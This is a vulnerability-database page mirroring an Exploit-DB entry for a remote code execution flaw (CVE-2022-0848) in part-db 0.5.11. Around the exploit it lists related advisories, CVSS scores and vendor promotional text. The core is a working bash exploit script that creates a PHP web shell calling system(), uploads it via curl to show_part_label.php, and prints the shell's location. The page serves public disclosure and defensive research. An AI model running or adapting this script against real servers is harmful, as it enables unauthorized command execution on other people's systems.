Lucene search
+L

part-db 0.5.11 - Remote Code Execution (RCE)

🗓️ 07 Mar 2022 00:00:00Reported by Chetanya SharmaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 437 Views

Remote Code Execution (RCE) in part-db 0.5.1

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for OS Command Injection in Part-Db_Project Part-Db
11 Mar 202207:26
githubexploit
zdt
zdt
part-db 0.5.11 - Remote Code Execution Exploit
7 Mar 202200:00
zdt
huntr
Huntr
OS Command Injection in part-db/part-db
15 Feb 202211:36
huntr
attackerkb
ATTACKERKB
CVE-2022-0848
4 Mar 202209:15
attackerkb
cnnvd
CNNVD
part-db 操作系统命令注入漏洞
4 Mar 202200:00
cnnvd
checkpoint_advisories
Check Point Advisories
Part-DB Project Unrestricted File Upload (CVE-2022-0848)
10 Nov 202200:00
checkpoint_advisories
cve
CVE
CVE-2022-0848
4 Mar 202208:25
cve
cvelist
Cvelist
CVE-2022-0848 OS Command Injection in part-db/part-db
4 Mar 202208:25
cvelist
nvd
NVD
CVE-2022-0848
4 Mar 202209:15
nvd
packetstorm
Packet Storm
part-db 0.5.11 Remote Code Execution
7 Mar 202200:00
packetstorm
Rows per page
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml  #PHP Shell Code
result=`curl -i -s -X POST -F "[email protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2022 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 3.19.8
CVSS 210
CVSS 310
EPSS0.35436
437